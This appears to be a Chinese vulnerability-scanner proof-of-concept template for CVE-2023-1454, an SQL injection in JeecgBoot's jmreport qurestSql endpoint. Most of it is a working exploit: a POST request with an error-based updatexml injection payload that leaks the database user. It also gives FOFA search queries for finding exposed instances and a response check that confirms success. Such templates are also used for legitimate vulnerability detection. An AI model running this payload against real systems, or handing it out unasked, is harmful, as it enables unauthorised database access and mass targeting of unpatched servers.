漏洞描述
JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。JeecgBoot qurestSql处存在SQL注入漏洞,攻击者可以从其中获取数据库权限。
FOFA: "jeecg-boot"
FOFA: app="JeecgBoot-企业级低代码平台"
id: CVE-2023-1454
info:
name: Jeecg Boot QuerySql sql injection
author: zan8in
severity: high
verified: true
description: |
JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。JeecgBoot qurestSql处存在SQL注入漏洞,攻击者可以从其中获取数据库权限。
FOFA: "jeecg-boot"
FOFA: app="JeecgBoot-企业级低代码平台"
reference:
- https://mp.weixin.qq.com/s/8lub-Nr9X7UUCTnUVoYQ7Q
rules:
r0:
request:
method: POST
path: /jeecg-boot/jmreport/qurestSql
headers:
Content-Type: application/json;charset=UTF-8
body: |
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
expression: response.status == 200 && response.body.bcontains(b'XPATH syntax error')
expression: r0()